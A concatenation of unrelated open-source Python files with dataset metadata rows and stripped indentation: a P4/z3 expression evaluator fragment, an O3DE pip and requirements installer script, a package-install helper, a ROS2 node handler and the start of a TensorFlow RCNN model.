# TODO: need to take a closer look on how to do this correctly...
# If we cast do we add/remove the least or most significant bits?
def __init__(self, val, to_size):
self.val = val
self.to_size = to_size
operator = z3_cast
P4BinaryOp.__init__(self, val, to_size, operator)
def eval(self, p4_state):
lval_expr = p4_state.resolve_expr(self.lval)
# it can happen that we cast to a complex type...
if isinstance(self.rval, P4ComplexType):
instance = self.rval.instantiate(self.rval.name)
initializer = P4Initializer(lval_expr, instance)
return initializer.eval(p4_state)
rval_expr = p4_state.resolve_expr(self.rval)
# align the bitvectors to allow operations
lval_is_bitvec = isinstance(lval_expr, z3.BitVecRef)
rval_is_bitvec = isinstance(rval_expr, z3.BitVecRef)
if lval_is_bitvec and rval_is_bitvec:
if lval_expr.size() < rval_expr.size():
rval_expr = z3_cast(rval_expr, lval_expr.size())
if lval_expr.size() > rval_expr.size():
lval_expr = z3_cast(lval_expr, rval_expr.size())
return self.operator(lval_expr, rval_expr)
class P4Mux(P4Expression):
def __init__(self, cond, then_val, else_val):
self.cond = cond
self.then_val = then_val
self.else_val = else_val
def unravel_datatype(self, complex_type, datatype_list):
unravelled_list = []
for val in datatype_list:
if isinstance(complex_type, P4ComplexInstance):
val = complex_type.resolve_reference(val)
if isinstance(val, P4ComplexInstance):
val_list = list(val.members)
val = self.unravel_datatype(val, val_list)
elif isinstance(val, list):
unravelled_list.extend(val)
else:
unravelled_list.append(val)
return unravelled_list
def eval(self, p4_state):
cond = p4_state.resolve_expr(self.cond)
# handle side effects for function calls
var_store, chain_copy = p4_state.checkpoint()
then_val = p4_state.resolve_expr(self.then_val)
then_vars = copy_attrs(p4_state.locals)
p4_state.restore(var_store, chain_copy)
else_val = p4_state.resolve_expr(self.else_val)
p4_state.merge_attrs(cond, then_vars)
then_expr = then_val
else_expr = else_val
# this is a really nasty hack, do not try this at home kids
# because we have to be able to access the sub values again
# we have to resolve the if condition in the case of complex types
# we do this by splitting the if statement into a list
# lists can easily be assigned to a target structure
if isinstance(then_expr, P4ComplexInstance):
then_expr = then_expr.flatten()
if isinstance(else_expr, P4ComplexInstance):
else_expr = else_expr.flatten()
if isinstance(then_expr, list) and isinstance(else_expr, list):
sub_cond = []
# handle nested complex types
then_expr = self.unravel_datatype(then_val, then_expr)
else_expr = self.unravel_datatype(else_val, else_expr)
for idx, member in enumerate(then_expr):
if_expr = z3.If(cond, member, else_expr[idx])
sub_cond.append(if_expr)
return sub_cond
then_is_const = isinstance(then_expr, (z3.BitVecRef, int))
else_is_const = isinstance(else_expr, (z3.BitVecRef, int))
if then_is_const and else_is_const:
# align the bitvectors to allow operations, we cast ints downwards
if else_expr.size() > then_expr.size():
else_expr = z3_cast(else_expr, then_expr.size())
if else_expr.size() < then_expr.size():
then_expr = z3_cast(then_expr, else_expr.size())
return z3.If(cond, then_expr, else_expr)
| 37.44668 | 95 | 0.620762 | 18,350 | 0.985976 | 0 | 0 | 0 | 0 | 0 | 0 | 3,217 | 0.172855 |
d32c20ceadd90960ca062de8a0331b5c9ee0d37a | 18,597 | py | Python | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/foundation.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/foundation.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/foundation.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | # coding:utf-8
#!/usr/bin/python
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
# -------------------------------------------------------------------------
"""! @brief
Module Documentation:
< DCCsi > / foundation.py
Running this module installs the DCCsi python requirements.txt for other python interpreters (like Maya)
It installs based on the python version into a location (such as):
<o3de>/Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/3rdParty/Python/Lib/3.x
This is to ensure that we are not modifying the users DCC tools install directly.
For this script to function on windows you may need Administrator privledges.
^ You only have to start with Admin rights if you are running foundation.py or otherwise updating packages
Open an admin elevated cmd prompt here:
C:\depot\o3de-dev\Gems\AtomLyIntegration\TechnicalArt\DccScriptingInterface
The following would execpt this script, the default behaviour is to check
the o3de python and install the requirements.txt for that python version,
>python.cmd foundation.py
To Do: document additional usage (how to install for Maya 2022 py3.7, etc.)
"""
# -------------------------------------------------------------------------
# standard imports
import subprocess
import sys
import os
import site
import timeit
import inspect
import traceback
from pathlib import Path
import logging as _logging
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
#os.environ['PYTHONINSPECT'] = 'True'
_START = timeit.default_timer() # start tracking
# global scope
_MODULENAME = 'foundation'
_LOGGER = _logging.getLogger(_MODULENAME)
_LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Local access
_MODULE_PATH = Path(__file__) # this script
_PATH_DCCSIG = Path(_MODULE_PATH.parent) # dccsi
os.environ['PATH_DCCSIG'] = _PATH_DCCSIG.as_posix()
site.addsitedir(_PATH_DCCSIG.as_posix()) # python path
os.chdir(_PATH_DCCSIG.as_posix())
# the path we want to install packages into
STR_PATH_DCCSI_PYTHON_LIB = str('{0}\\3rdParty\\Python\\Lib\\{1}.x\\{1}.{2}.x\\site-packages')
# these are just defaults and are meant to be replaced by info for the target python.exe
_SYS_VER_MAJOR = sys.version_info.major
_SYS_VER_MINOR = sys.version_info.minor
# the default will be based on the python executable running this module
# this value should be replaced with the sys,version of the target python
# for example mayapy, or blenders python, etc.
_PATH_DCCSI_PYTHON_LIB = Path(STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
_SYS_VER_MAJOR,
_SYS_VER_MINOR))
# this is the shared default requirements.txt file to install for python 3.6.x+
_DCCSI_PYTHON_REQUIREMENTS = Path(_PATH_DCCSIG, 'requirements.txt')
# this will default to the python interpretter running this script (probably o3de)
# this should be relaced by the target interpretter python exe, like mayapy.exe
_PYTHON_EXE = Path(sys.executable)
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def check_pip(python_exe=_PYTHON_EXE):
"""Check if pip is installed and log what version"""
python_exe = Path(python_exe)
if python_exe.exists():
result = subprocess.call( [python_exe.as_posix(), "-m", "pip", "--version"] )
_LOGGER.info(f'foundation.check_pip(), result: {result}')
return result
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 1
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def ensurepip(python_exe=_PYTHON_EXE, upgrade=False):
"""Will use ensurepip method to ensure pip is installed"""
#note: this doesn't work with python 3.7 which is the version o3de is on
#luckily o3de comes with working pip
#if this errors out with an exception and "ValueError: bad marshal data (unknown type code)"
#you should try to install pip using dfoundation.install_pip() method
result = 0
python_exe = Path(python_exe)
if python_exe.exists():
if upgrade:
result = subprocess.call( [python_exe.as_posix(), "-m", "ensurepip", "--upgrade"] )
_LOGGER.info(f'foundation.ensurepip(python_exe, upgrade=True), result: {result}')
else:
result = subprocess.call( [python_exe.as_posix(), "-m", "ensurepip"] )
_LOGGER.info(f'foundation.ensurepip(python_exe), result: {result}')
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 0
return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
_GET_PIP_PY37_URL = "https://bootstrap.pypa.io/get-pip.py"
_GET_PIP_PY27_URL = "https://bootstrap.pypa.io/pip/2.7/get-pip.py"
# version to download (DL)
if sys.version_info.major >= 3 and sys.version_info.minor >= 7:
DL_URL = _GET_PIP_PY37_URL
elif sys.version_info.major < 3:
DL_URL = _GET_PIP_PY27_URL
# temp dir to store in:
_PIP_DL_LOC = Path(_PATH_DCCSIG) / '__tmp__'
if not _PIP_DL_LOC.exists():
try:
_PIP_DL_LOC.mkdir(parents=True)
except Exception as e:
_LOGGER.error(f'error: {e}, could not .mkdir(): {PIP_DL_LOC.as_posix()}')
# default file location to store it:
_PIP_DL_LOC = _PIP_DL_LOC / 'get-pip.py'
try:
_PIP_DL_LOC.touch(mode=0o666, exist_ok=True)
except Exception as e:
_LOGGER.error(f'error: {e}, could not .touch(): {PIP_DL_LOC.as_posix()}')
def download_getpip(url=DL_URL, file_store=_PIP_DL_LOC):
"""Attempts to download the get-pip.py script"""
import requests
# ensure what is passed in is a Path object
file_store = Path(file_store)
file_store = Path.joinpath(file_store)
try:
file_store.exists()
except FileExistsError as e:
try:
file_store.touch()
except FileExistsError as e:
_LOGGER.error(f'Could not make file: {file_store}')
try:
_get_pip = requests.get(url)
except Exception as e:
_LOGGER.error(f'could not request: {url}')
try:
file = open(file_store.as_posix(), 'wb').write(_get_pip.content)
return file
except IOError as e:
_LOGGER.error(f'could not write: {file_store.as_posix()}')
return None
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def install_pip(python_exe=_PYTHON_EXE, download=True, upgrade=True, getpip=_PIP_DL_LOC):
"""Installs pip via get-pip.py"""
result = 0
if download:
getpip = download_getpip()
if not getpip:
return result
python_exe = Path(python_exe)
if python_exe.exists():
python_exe = python_exe.as_posix()
result = subprocess.call( [python_exe, "-m", getpip] )
_LOGGER.info(f'result: {result}')
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 0
if upgrade:
python_exe = python_exe.as_posix()
result = subprocess.call( [python_exe, "-m", "pip", "install", "--upgrade", "pip"] )
_LOGGER.info(f'result: {result}')
return result
return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# version of requirements.txt to installa
if sys.version_info.major >= 3 and sys.version_info.minor >= 7:
_REQUIREMENTS = _DCCSI_PYTHON_REQUIREMENTS
elif sys.version_info.major == 2 and sys.version_info.minor >= 7:
_LOGGER.warning('Python 2.7 is end of life, we recommend using tools that operate py3.7 or higher')
_REQUIREMENTS = Path(_PATH_DCCSIG,
'Tools',
'Resources',
'py27',
'requirements.txt').as_posix()
else:
_REQUIREMENTS = None
_LOGGER.error(f'Unsupported version: {sys.version_info}')
def install_requirements(python_exe=_PYTHON_EXE,
requirements=_REQUIREMENTS,
target_loc=_PATH_DCCSI_PYTHON_LIB.as_posix()):
"""Installs the DCCsi requirments.txt"""
python_exe = Path(python_exe)
requirements = Path(requirements)
target_loc = Path(target_loc)
if python_exe.exists():
## install required packages
inst_cmd = [python_exe.as_posix(), "-m", "pip", "install",
"-r", requirements.as_posix(), "-t", target_loc.as_posix()]
result = subprocess.call( inst_cmd )
return result
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 0
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def install_pkg(python_exe=_PYTHON_EXE,
pkg_name='pathlib',
target_loc=_PATH_DCCSI_PYTHON_LIB.as_posix()):
"""Installs a pkg for DCCsi"""
python_exe = Path(python_exe)
pkg_name = Path(pkg_name)
target_loc = Path(target_loc)
if python_exe.exists():
inst_cmd = [python_exe.as_posix(), "-m", "pip", "install", pkg_name.as_posix(),
"-t", target_loc.as_posix()]
result = subprocess.call( inst_cmd )
return result
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 0
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def run_command() -> 'subprocess.CompletedProcess[str]':
"""Run some subprocess that captures output as ``str``"""
return subprocess.CompletedProcess(args=[], returncode=0, stdout='')
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def arg_bool(bool_arg, desc='arg desc not set'):
"""cast a arg bool to a python bool"""
_LOGGER.info(f"Checking '{desc}': {bool_arg}")
if bool_arg in ('True', 'true', '1'):
return True
elif bool_arg in ('False', 'false', '0'):
return False
else:
return bool_arg
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def set_version(ver_major=sys.version_info.major, ver_minor=sys.version_info.minor):
global _SYS_VER_MAJOR
global _SYS_VER_MINOR
global _PATH_DCCSI_PYTHON_LIB
_SYS_VER_MAJOR = ver_major
_SYS_VER_MINOR = ver_minor
_PATH_DCCSI_PYTHON_LIB = Path(STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
_SYS_VER_MAJOR,
_SYS_VER_MINOR))
return _PATH_DCCSI_PYTHON_LIB
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def get_version(_PYTHON_EXE):
_PYTHON_EXE = Path(_PYTHON_EXE)
if _PYTHON_EXE.exists():
# this will switch to run the specified dcc tools python exe and determine version
_COMMAND = [_PYTHON_EXE.as_posix(), "--version"]
_process = subprocess.Popen(_COMMAND, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_out, _err = _process.communicate()
_out = _out.decode("utf-8") # decodes byte string to string
_out = _out.replace("\r\n", "") # clean
_LOGGER.info(f'Python Version is: {_out}')
_ver = _out.split(" ")[-1] # split by space, take version
_ver = _ver.split('.') # splity by . to list
return _ver
else:
_LOGGER.error(f'Python exe does not exist: {_PYTHON_EXE.as_posix()}')
return None
# -------------------------------------------------------------------------
###########################################################################
# Main Code Block, runs this script as main (testing)
# -------------------------------------------------------------------------
if __name__ == '__main__':
"""Run this file as main (external commandline)"""
#os.environ['PYTHONINSPECT'] = 'True'
STR_CROSSBAR = f"{'-' * 74}"
_DCCSI_GDEBUG = False
_DCCSI_DEV_MODE = False
# default loglevel to info unless set
_DCCSI_LOGLEVEL = _logging.INFO
if _DCCSI_GDEBUG:
# override loglevel if runnign debug
_DCCSI_LOGLEVEL = _logging.DEBUG
FRMT_LOG_LONG = "[%(name)s][%(levelname)s] >> %(message)s (%(asctime)s; %(filename)s:%(lineno)d)"
# configure basic logger
# note: not using a common logger to reduce cyclical imports
_logging.basicConfig(level=_DCCSI_LOGLEVEL,
format=FRMT_LOG_LONG,
datefmt='%m-%d %H:%M')
_LOGGER = _logging.getLogger(_MODULENAME)
_LOGGER.info(STR_CROSSBAR)
_LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
_LOGGER.debug('_DCCSI_GDEBUG: {}'.format(_DCCSI_GDEBUG))
_LOGGER.debug('_DCCSI_DEV_MODE: {}'.format(_DCCSI_DEV_MODE))
_LOGGER.debug('_DCCSI_LOGLEVEL: {}'.format(_DCCSI_LOGLEVEL))
import argparse
parser = argparse.ArgumentParser(
description='O3DE DCCsi Setup (aka Foundation). Will install DCCsi python package dependancies, for various DCC tools.',
epilog="It is suggested to use '-py' or '--python_exe' to pass in the python exe for the target dcc tool.")
parser.add_argument('-gd', '--global-debug',
type=bool,
required=False,
help='Enables global debug flag.')
parser.add_argument('-dm', '--developer-mode',
type=bool,
required=False,
default=False,
help='(NOT IMPLEMENTED) Enables dev mode for early auto attaching debugger.')
parser.add_argument('-sd', '--set-debugger',
type=str,
required=False,
default='WING',
help='(NOT IMPLEMENTED) Default debugger: WING, others: PYCHARM and VSCODE.')
parser.add_argument('-py', '--python_exe',
type=str,
required=False,
help='The python interpretter you want to run in the subprocess')
parser.add_argument('-cp', '--check_pip',
required=False,
default=True,
help='Checks for pip')
parser.add_argument('-ep', '--ensurepip',
required=False,
default=False,
help='Uses ensurepip, to make sure pip is installed')
parser.add_argument('-ip', '--install_pip',
required=False,
default=False,
help='Attempts install pip via download of get-pip.py')
parser.add_argument('-ir', '--install_requirements',
required=False,
default=True,
help='Exits python')
parser.add_argument('-ex', '--exit',
type=bool,
required=False,
default=False,
help='Exits python. Do not exit if you want to be in interactive interpretter after config')
args = parser.parse_args()
# easy overrides
if args.global_debug:
_DCCSI_GDEBUG = True
os.environ["DYNACONF_DCCSI_GDEBUG"] = str(_DCCSI_GDEBUG)
if not args.python_exe:
_LOGGER.warning("It is suggested to use arg '-py' or '--python_exe' to pass in the python exe for the target dcc tool.")
if args.python_exe:
_PYTHON_EXE = Path(args.python_exe)
_LOGGER.info(f'Target py exe is: {_PYTHON_EXE}')
if _PYTHON_EXE.exists():
_py_version = get_version(_PYTHON_EXE)
# then we can change the version dependant target folder for pkg install
_PATH_DCCSI_PYTHON_LIB = set_version(_py_version[0], _py_version[1])
if _PATH_DCCSI_PYTHON_LIB.exists():
_LOGGER.info(f'Requirements, install target: {_PATH_DCCSI_PYTHON_LIB}')
else:
_PATH_DCCSI_PYTHON_LIB.touch()
_LOGGER.info(f'.touch(): {_PATH_DCCSI_PYTHON_LIB}')
else:
_LOGGER.error(f'This py exe does not exist:{_PYTHON_EXE}')
sys.exit()
# this will verify pip is installed for the target python interpretter/env
if arg_bool(args.check_pip, desc='args.check_pip'):
_LOGGER.info(f'calling foundation.check_pip()')
result = check_pip(_PYTHON_EXE)
if result != 0:
_LOGGER.warning( f'check_pip(), Invalid result: { result }' )
if arg_bool(args.ensurepip, desc='args.ensurepip'):
_LOGGER.info(f'calling foundation.ensurepip()')
ensurepip(_PYTHON_EXE)
if arg_bool(args.install_pip, desc='args.install_pip'):
_LOGGER.info(f'calling foundation.install_pip()')
install_pip(_PYTHON_EXE)
# installing the requirments.txt is enabled by default
if arg_bool(args.install_requirements, desc='args.check_pip'):
_LOGGER.info(f'calling foundation.install_requirements( {_PYTHON_EXE}, target_loc = {_PATH_DCCSI_PYTHON_LIB.as_posix()} )')
install_requirements(_PYTHON_EXE, target_loc = _PATH_DCCSI_PYTHON_LIB.as_posix())
# -- DONE ----
_LOGGER.info(STR_CROSSBAR)
_LOGGER.info('O3DE DCCsi {0}.py took: {1} sec'.format(_MODULENAME, timeit.default_timer() - _START))
if args.exit:
import sys
# return
sys.exit()
else:
# custom prompt
sys.ps1 = "[{}]>>".format(_MODULENAME)
# --- END -----------------------------------------------------------------
| 38.108607 | 131 | 0.560789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,802 | 0.473302 |
d32c86dc486eaa041056b260ea19eef0c3713838 | 4,672 | py | Python | analyze/install.py | takkii/Pylean | d51595e2788e946d9a2492bbe7131e4ada19062f | [
"MIT"
] | 1 | 2020-06-22T10:05:23.000Z | 2020-06-22T10:05:23.000Z | analyze/install.py | takkii/Pylean | d51595e2788e946d9a2492bbe7131e4ada19062f | [
"MIT"
] | null | null | null | analyze/install.py | takkii/Pylean | d51595e2788e946d9a2492bbe7131e4ada19062f | [
"MIT"
] | null | null | null | import importlib
import platform
import site
import subprocess
import sys
import traceback
class InstallerClass:
sci_win = ['python', '-m', 'pip', 'install', 'scikit-learn']
nump_win = ['python', '-m', 'pip', 'install', 'numpy']
pan_win = ['python', '-m', 'pip', 'install', 'pandas']
req_win = ['python', '-m', 'pip', 'install', 'requests-html']
bs4_win = ['python', '-m', 'pip', 'install', 'beautifulsoup4']
mat_win = ['python', '-m', 'pip', 'install', 'matplotlib']
sci = ['python3', '-m', 'pip', 'install', 'scikit-learn']
nump = ['python3', '-m', 'pip', 'install', 'numpy']
pan = ['python3', '-m', 'pip', 'install', 'pandas']
req = ['python3', '-m', 'pip', 'install', 'requests-html']
bs4 = ['python3', '-m', 'pip', 'install', 'beautifulsoup4']
mat = ['python3', '-m', 'pip', 'install', 'matplotlib']
def sci_win_method(self):
try:
ret_sci_win = subprocess.run(self.sci_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_sci_win)
except Exception:
traceback.print_exc()
def nump_win_method(self):
try:
ret_nump_win = subprocess.run(self.nump_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_nump_win)
except Exception:
traceback.print_exc()
def pan_win_method(self):
try:
ret_pan_win = subprocess.run(self.pan_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_pan_win)
except Exception:
traceback.print_exc()
def req_win_method(self):
try:
ret_req_win = subprocess.run(self.req_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_req_win)
except Exception:
traceback.print_exc()
def bs4_win_method(self):
try:
ret_bs4_win = subprocess.run(self.bs4_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_bs4_win)
except Exception:
traceback.print_exc()
def mat_win_method(self):
try:
ret_mat_win = subprocess.run(self.mat_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_mat_win)
except Exception:
traceback.print_exc()
def sci_method(self):
try:
ret_sci = subprocess.run(self.sci, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_sci)
except Exception:
traceback.print_exc()
def nump_method(self):
try:
ret_nump = subprocess.run(self.nump, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_nump)
except Exception:
traceback.print_exc()
def pan_method(self):
try:
ret_pan = subprocess.run(self.pan, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_pan)
except Exception:
traceback.print_exc()
def req_method(self):
try:
ret_req = subprocess.run(self.req, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_req)
except Exception:
traceback.print_exc()
def bs4_method(self):
try:
ret_bs4 = subprocess.run(self.bs4, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_bs4)
except Exception:
traceback.print_exc()
def mat_method(self):
try:
ret_mat = subprocess.run(self.mat, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_mat)
except Exception:
traceback.print_exc()
if sys.version_info[0] == 2:
print("This installer is Python2 not supported.")
elif sys.version_info[0] == 3:
pf = platform.system()
if pf == 'Windows':
InstClass = InstallerClass()
InstClass.sci_win_method()
InstClass.nump_win_method()
InstClass.pan_win_method()
InstClass.req_win_method()
InstClass.bs4_win_method()
InstClass.mat_win_method()
elif pf == 'Darwin':
InstClass = InstallerClass()
InstClass.sci_method()
InstClass.nump_method()
InstClass.pan_method()
InstClass.req_method()
InstClass.bs4_method()
InstClass.mat_method()
elif pf == 'Linux':
InstClass = InstallerClass()
InstClass.sci_method()
InstClass.nump_method()
InstClass.pan_method()
InstClass.req_method()
InstClass.bs4_method()
InstClass.mat_method()
else:
print("Installer does not support OS other than Windows, MacOS and Linux kernel.")
else:
print("A version other than Python2 and Python3. Does not match.")
importlib.reload(site)
| 31.355705 | 98 | 0.596747 | 3,458 | 0.740154 | 0 | 0 | 0 | 0 | 0 | 0 | 746 | 0.159675 |
d32c8a2b7b92d8fdaee8fe0058c22508187e19a3 | 5,871 | py | Python | ros2_workspace/src/kumo/kumo/handlers/node_handler.py | ichiro-its/kumo-playground | 26163a5d80a81976482014855cf2796a44182608 | [
"MIT"
] | 2 | 2021-03-07T12:27:11.000Z | 2021-03-19T16:25:59.000Z | ros2_workspace/src/kumo/kumo/handlers/node_handler.py | ichiro-its/kumo-playground | 26163a5d80a81976482014855cf2796a44182608 | [
"MIT"
] | 20 | 2021-03-07T12:05:52.000Z | 2021-07-22T13:33:13.000Z | ros2_workspace/src/kumo/kumo/handlers/node_handler.py | ichiro-its/kumo-playground | 26163a5d80a81976482014855cf2796a44182608 | [
"MIT"
] | 1 | 2021-12-02T01:24:40.000Z | 2021-12-02T01:24:40.000Z | # Copyright (c) 2021 Ichiro ITS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import rclpy
from rclpy.logging import get_logger
from rosidl_runtime_py.utilities import get_message, get_service
from kumo.handlers.base_handler import BaseHandler, Connection
from kumo.handlers.client_handler import ClientHandler
from kumo.handlers.publisher_handler import PublisherHandler
from kumo.handlers.service_handler import ServiceHandler
from kumo.handlers.subscription_handler import SubscriptionHandler
from kumo.message import Message, MessageType
class NodeHandler(BaseHandler):
def __init__(self, connection: Connection, name: str):
super().__init__(connection)
self.node = rclpy.create_node(name)
self.logger = get_logger('node_%s' % self.id)
def destroy(self) -> bool:
if super().destroy():
self.logger.warn('Destroying Node...')
self.node.destroy_node()
async def handle_message(self, message: Message) -> None:
if message.type == MessageType.DESTROY_NODE:
try:
return await self.handle_destroy_node(message)
except Exception as e:
self.logger.error('Failed to destroy Node! %s' % str(e))
await self.send_error_response(message, e)
elif message.type == MessageType.CREATE_PUBLISHER:
try:
return await self.handle_create_publisher(message)
except Exception as e:
self.logger.error('Failed to create a Publisher! %s' % str(e))
await self.send_error_response(message, e)
elif message.type == MessageType.CREATE_SUBSCRIPTION:
try:
return await self.handle_create_subscription(message)
except Exception as e:
self.logger.error('Failed to create a Subscription! %s' % str(e))
await self.send_error_response(message, e)
elif message.type == MessageType.CREATE_CLIENT:
try:
return await self.handle_create_client(message)
except Exception as e:
self.logger.error('Failed to create a Client! %s' % str(e))
await self.send_error_response(message, e)
elif message.type == MessageType.CREATE_SERVICE:
try:
return await self.handle_create_service(message)
except Exception as e:
self.logger.error('Failed to create a Service! %s' % str(e))
await self.send_error_response(message, e)
await super().handle_message(message)
async def handle_destroy_node(self, message: Message) -> None:
if message.content.get('node_id') == self.id:
self.destroy()
await self.send_response(message, {'node_id': self.id})
async def handle_create_publisher(self, message: Message) -> None:
if message.content.get('node_id') == self.id:
publisher = PublisherHandler(
self.connection, self.node,
get_message(message.content.get('message_type')),
message.content.get('topic_name'))
self.attach(publisher)
self.logger.info('Publisher %s created!' % publisher.id)
await self.send_response(message, {'publisher_id': publisher.id})
async def handle_create_subscription(self, message: Message) -> None:
if message.content.get('node_id') == self.id:
subscription = SubscriptionHandler(
self.connection, self.node,
get_message(message.content.get('message_type')),
message.content.get('topic_name'))
self.attach(subscription)
self.logger.info('Subscription %s created!' % subscription.id)
await self.send_response(message, {'subscription_id': subscription.id})
async def handle_create_client(self, message: Message) -> None:
if message.content.get('node_id') == self.id:
client = ClientHandler(
self.connection, self.node,
get_service(message.content.get('service_type')),
message.content.get('service_name'))
self.attach(client)
self.logger.info('Client %s created!' % client.id)
await self.send_response(message, {'client_id': client.id})
async def handle_create_service(self, message: Message) -> None:
if message.content.get('node_id') == self.id:
service = ServiceHandler(
self.connection, self.node,
get_service(message.content.get('service_type')),
message.content.get('service_name'))
self.attach(service)
self.logger.info('Service %s created!' % service.id)
await self.send_response(message, {'service_id': service.id})
| 41.055944 | 83 | 0.656788 | 4,313 | 0.734628 | 0 | 0 | 0 | 0 | 3,899 | 0.664112 | 1,567 | 0.266905 |
d32d334b2b10906c6a65aadf1d57e8f4c1285936 | 6,560 | py | Python | rcnn.py | PlanetExp/rcnn | c0f26c18c17334d7185a83b60c68eaf4357246bf | [
"Apache-2.0"
] | null | null | null | rcnn.py | PlanetExp/rcnn | c0f26c18c17334d7185a83b60c68eaf4357246bf | [
"Apache-2.0"
] | null | null | null | rcnn.py | PlanetExp/rcnn | c0f26c18c17334d7185a83b60c68eaf4357246bf | [
"Apache-2.0"
] | null | null | null | """RCNN model
"""
import tensorflow as tf
from define_scope import define_scope # custom decorators
class Model:
def __init__(self, X, y, output_size=None,
learning_rate=1e-5, learning_rate_decay=0.95,
reg=1e-5, dropout=0.5, verbose=False):
"""
Initalize the model.
Inputs:
- output_size: number of classes C
- learning_rate: Scalar giving learning rate for optimization.
- learning_rate_decay: Scalar giving factor used to decay the learning rate
after each epoch.
"""
self.X = X
self.y = y
self.learning_rate = learning_rate
self.learning_rate_decay = learning_rate_decay
self.dropout = dropout
# Store layers weight & bias
self.params = {
# input is [1, 9, 9, 1]
# 3x3 conv, 1 input, 8 outputs
'Wc1': tf.Variable(tf.random_normal([1, 1, 1, 32]), name='Wc1'),
# 3x3 conv, 8 inputs, 16 outputs
'Wc2': tf.Variable(tf.random_normal([3, 3, 32, 32]), name='Wc2'), # shared
# fully connected, 9*9*16 inputs, 512 outputs
'Wd1': tf.Variable(tf.random_normal([9 * 9 * 32, 32])),
# 512 inputs, 2 outputs (class prediction)
'Wout': tf.Variable(tf.random_normal([32, output_size])), # n_classes
# biases
'bc1': tf.Variable(tf.random_normal([32])),
'bc2': tf.Variable(tf.random_normal([32])),
'bd1': tf.Variable(tf.random_normal([32])),
'bout': tf.Variable(tf.random_normal([output_size])) # n_classes
}
# Instantiate functions once
# self.loss
# self.inference
# self.train
# self.predict
@define_scope
def inference(self):
"""
Setting up inference of model
Returns:
logits
"""
# Create some wrappers for simplicity
def conv2d(X, W, b, strides=1):
# Conv2D wrapper, with bias and relu activation
X = tf.nn.conv2d(X, W, strides=[1, strides, strides, 1], padding='SAME')
X = tf.nn.bias_add(X, b)
return tf.nn.relu(X)
def weight_variable(shape):
"""Create a weight variable with appropriate initialization."""
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"""Create a bias variable with appropriate initialization."""
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def variable_summaries(var, name):
"""Attach a lot of summaries to a Tensor."""
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.scalar_summary('mean/' + name, mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.scalar_summary('stddev/' + name, stddev)
tf.scalar_summary('max/' + name, tf.reduce_max(var))
tf.scalar_summary('min/' + name, tf.reduce_min(var))
tf.histogram_summary(name, var)
def nn_layer(input_tensor, input_dim, output_dim, layer_name, act=tf.nn.relu):
"""Rusable layer code for tensorboard naming
